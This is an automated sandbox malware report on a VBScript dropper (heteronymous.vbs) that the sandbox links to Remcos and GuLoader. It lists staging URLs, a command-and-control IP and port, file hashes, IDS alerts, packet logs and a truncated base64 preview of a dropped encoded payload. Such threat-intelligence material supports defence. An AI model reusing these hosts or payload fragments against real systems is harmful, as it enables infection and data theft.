                                                                http://geoplugin.net/msiexec.exe, 00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://fo2xc.icupowershell.exe, 00000002.00000002.2263250482.0000020CDD880000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://fo2xc.icu/yAvXCrQD/Mestrpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://fo2xc.icu/yAvXCrpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://fo2xc.icu/yAvpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                    high
                                                                    https://fo2xc.icu/yAvXCrQD/Mestrendpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2263250482.0000020CDBBC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://fo2xc.icu/yAvXCrQpowershell.exe, 00000002.00000002.2263250482.0000020CDCDE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://geoplugin.net/json.gp3wmsiexec.exe, 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.ebuddy.commsiexec.exefalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          172.67.136.42
                                                                          fo2xc.icuUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          154.216.18.62
                                                                          unknownSeychelles
                                                                          135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                                                          178.237.33.50
                                                                          geoplugin.netNetherlands
                                                                          8455ATOM86-ASATOM86NLfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1582685
                                                                          Start date and time:2024-12-31 09:27:11 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 8m 18s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:12
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:heteronymous.vbs
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.expl.evad.winVBS@14/10@2/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 66.7%
                                                                          HCA Information:
                                                                          • Successful, ratio: 98%
                                                                          • Number of executed functions: 164
                                                                          • Number of non-executed functions: 282
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .vbs
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 20.190.159.75
                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target powershell.exe, PID 1076 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 6592 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          03:28:13API Interceptor81x Sleep call for process: powershell.exe modified
                                                                          03:29:31API Interceptor484349x Sleep call for process: msiexec.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          154.216.18.62Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            178.237.33.502LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            17346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            geoplugin.net2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            17346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSre5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.96.3
                                                                            DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                            • 104.17.247.203
                                                                            Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            https://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                                            • 104.21.96.1
                                                                            Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.157.254
                                                                            RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                            • 104.26.12.205
                                                                            SKHT-ASShenzhenKatherineHengTechnologyInformationCoboatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.216.17.216
                                                                            boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.216.17.216
                                                                            boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.216.17.216
                                                                            kwari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                            • 156.254.70.154
                                                                            boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.216.17.216
                                                                            boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.216.17.216
                                                                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.216.17.216
                                                                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.216.17.216
                                                                            boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.216.17.216
                                                                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.216.17.216
                                                                            ATOM86-ASATOM86NL2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            17346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0ere5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                            • 172.67.136.42
                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 172.67.136.42
                                                                            Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                            • 172.67.136.42
                                                                            Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                            • 172.67.136.42
                                                                            Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                            • 172.67.136.42
                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                            • 172.67.136.42
                                                                            hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 172.67.136.42
                                                                            web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                            • 172.67.136.42
                                                                            random.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.136.42
                                                                            eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.136.42
                                                                            37f463bf4616ecd445d4a1937da06e19zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                                                            • 172.67.136.42
                                                                            hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                                                            • 172.67.136.42
                                                                            Loader.exeGet hashmaliciousMeduza StealerBrowse
                                                                            • 172.67.136.42
                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                            • 172.67.136.42
                                                                            BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                            • 172.67.136.42
                                                                            Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                            • 172.67.136.42
                                                                            Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                            • 172.67.136.42
                                                                            Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                            • 172.67.136.42
                                                                            Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                            • 172.67.136.42
                                                                            xyxmml.msiGet hashmaliciousXRedBrowse
                                                                            • 172.67.136.42
                                                                            No context
                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):963
                                                                            Entropy (8bit):5.019506780280991
                                                                            Encrypted:false
                                                                            SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzd:qlupdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                            MD5:7459F6DA71CD5EAF9DBE2D20CA9434AC
                                                                            SHA1:4F60E33E15277F7A632D8CD058EC7DF4728B40BC
                                                                            SHA-256:364A445C3A222EE10A8816F78283BBD0503A5E5824B2A7F5DCD8E6DA9148AF6A
                                                                            SHA-512:3A862711D78F6F97F07E01ACC0DCB54F595A23AACEA9F2BB9606382805E1E92C1ACE09E1446F312F3B6D4EE63435ABEF46F0C16F015BD505347A1BCF2E149841
                                                                            Malicious:false
                                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):8003
                                                                            Entropy (8bit):4.840877972214509
                                                                            Encrypted:false
                                                                            SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                            MD5:106D01F562D751E62B702803895E93E0
                                                                            SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                            SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                            SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                            Malicious:false
                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1940658735648508
                                                                            Encrypted:false
                                                                            SSDEEP:3:NlllulVmdtZ:NllUM
                                                                            MD5:013016A37665E1E37F0A3576A8EC8324
                                                                            SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                                            SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                                            SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                                            Malicious:false
                                                                            Preview:@...e................................................@..........
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf61f3aa6, page size 32768, DirtyShutdown, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):17301504
                                                                            Entropy (8bit):0.803443017403421
                                                                            Encrypted:false
                                                                            SSDEEP:6144:KdfjZb5aXEY2waXEY24URlWe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+u:IVQ4e81ySaKKjsrONseW2
                                                                            MD5:79BECB9DFD99861D39E1140C38EFB58F
                                                                            SHA1:852C04BEF5B628EC8E60F252C09F1B813315C07E
                                                                            SHA-256:8730130CA7A3711EF1F82473E3E896A77456DD1EFA62BB322D705E1124BFE0AA
                                                                            SHA-512:D4272EFFD4F8CA186C4DB864A53F1A32EB5E5292C3D886AB36310E8875E891B21ABFEBFD5B7B2C62F6FAFE19BE7BA1DE4FAC116D61CE24EF4DF6D1432EE0A700
                                                                            Malicious:false
                                                                            Preview:..:.... .......;!......E{ow("...{........................@.....9....{u.;....|..h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{].................................[1..;....|...................8.j;....|...........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):431148
                                                                            Entropy (8bit):5.980040112269131
                                                                            Encrypted:false
                                                                            SSDEEP:6144:rGG4RWb6TWyizJqSUvw7BUmQE6Bvm9STX1LcsruxRl7CGGw3TeHDPS2C2jsLrm:zbcrwVUmQEjEFLJ8Gw3SH3
                                                                            MD5:832BE69B2C71215BD426016CDCFE1B4E
                                                                            SHA1:4737A05A74FD1832646630A8D3B128583F1E06B2
                                                                            SHA-256:DBC17F5B483DF2A4678FD5E5DFCBE82F6733D713C2CECEC18B7E44A233626408
                                                                            SHA-512:E61AF16146ED617FF419F1DF0648CCBB7D96ED486E3651DF606B286817B8FE58CF67A7E8783245B3261AF8CA08D08A9091D78F916E4F2E7EBE0AE1F573573180
                                                                            Malicious:false
                                                                            Preview:cQGbcQGbuzSgFABxAZtxAZsDXCQE6wKUvesCMNi5js7SPOsCUnfrArE4gfE6yrtvcQGb6wJJtoHptARpU3EBm3EBm3EBm+sCxF66aHpoU+sCk0zrArHs6wK1nusCq6wxyusCKDBxAZuJFAvrAqGDcQGb0eLrAmwycQGbg8EE6wJTsHEBm4H5jJJRBHzK6wIanHEBm4tEJARxAZvrAn3ficNxAZtxAZuBw4uWZwPrAn/a6wKlR7pFKY4CcQGbcQGbgfLpRuy16wIUCesC+KiB8qxvYrdxAZtxAZvrAnF/cQGbcQGbcQGbiwwQ6wKxvOsClLeJDBNxAZtxAZtC6wLRg3EBm4H6yHoEAHXWcQGbcQGbiVwkDOsCVoRxAZuB7QADAABxAZvrAva7i1QkCOsCIp/rAm7Li3wkBOsCFlLrAgZQietxAZvrAvpHgcOcAAAA6wIlsXEBm1PrAsHncQGbakDrApPXcQGbietxAZvrAqlOx4MAAQAAAEBpBOsCrHHrAqBxgcMAAQAA6wLQ5esCU9VTcQGbcQGbievrAsmM6wIVjYm7BAEAAHEBm3EBm4HDBAEAAHEBm3EBm1PrAvb0cQGbav9xAZtxAZuDwgXrAvlKcQGbMfbrAmZNcQGbMcnrAgOfcQGbixpxAZvrAm6cQXEBm3EBmzkcCnX06wK+IOsCctlG6wK+pOsCigSAfAr7uHXccQGb6wJhUItECvxxAZvrAgXkKfDrAgqlcQGb/9JxAZvrAi0Push6BABxAZvrAjtjMcDrAvQs6wJDeIt8JAxxAZvrAuoMgTQHuHxJa+sC+lTrAhD7g8AE6wLNGusCFCw50HXicQGbcQGbiftxAZvrAmDh/9frAr0EcQGb3tUx9FB+SWu4+K8w3vmD4l39pbIqM0/qfKXGJL4pwI4BjNtG/f24IyfvI+pJxBUPbf2gg+ims5x/XJyNtbsNZri5O+0I/T1muNXTEtL9DWa41FIc+RrMozk4RGtUh8GI
                                                                            File type:ASCII text, with very long lines (342), with CRLF line terminators
                                                                            Entropy (8bit):4.970426154174017
                                                                            TrID:
                                                                              File name:heteronymous.vbs
                                                                              File size:73'455 bytes
                                                                              MD5:fc612d46cca59534577f51b16710b323
                                                                              SHA1:b65ef6cf8e46d38e2ab287f6584c8d456c36202d
                                                                              SHA256:c43aa71f1636522145ea3e384b2546d5a589260cd7a2cc42688dda5944215b68
                                                                              SHA512:33d74f868914c55269f10af4680500ddbcbd9968207180e160e92eb981c2140deea18b47d58ecb592437cc397c6e61853850752455b21acd2f7071e6755b1f7a
                                                                              SSDEEP:1536:ggz3v5pA6TiWl+GJFQdGJVfYRFSlntJOEDy:ggj5aUie+oQwJ5YRECEDy
                                                                              TLSH:10734B62EF68066B0E4A279AFD542E86C57CC205452768E1FECD030D610B8ACE3FE31D
                                                                              File Content Preview:....Bestanddelsknoglemarvspr = RTrim("Courages")....'Taffle flaskehalses, uppowoc..'Asteer disengagere,..'Manducable: viljestyrkerne! dslere mandelgavens bogsamlingers..'Creophagous? handelsrejser, externate111! paedometrical? impostrous!..'Profilernes, i
                                                                              Icon Hash:68d69b8f86ab9a86
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-31T09:28:53.763489+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549905172.67.136.42443TCP
                                                                              2024-12-31T09:28:57.689337+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549932154.216.18.622404TCP
                                                                              2024-12-31T09:28:58.848927+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549943178.237.33.5080TCP
                                                                              2024-12-31T09:28:58.988295+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549942154.216.18.622404TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 31, 2024 09:28:15.304991961 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:15.305025101 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:15.305120945 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:15.312691927 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:15.312706947 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:15.774089098 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:15.774173021 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:15.778522968 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:15.778532028 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:15.778836012 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:15.796411037 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:15.839339018 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077483892 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077536106 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077577114 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077630997 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077663898 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077665091 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.077689886 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077724934 CET49713443192.168.2.5172.67.136.42
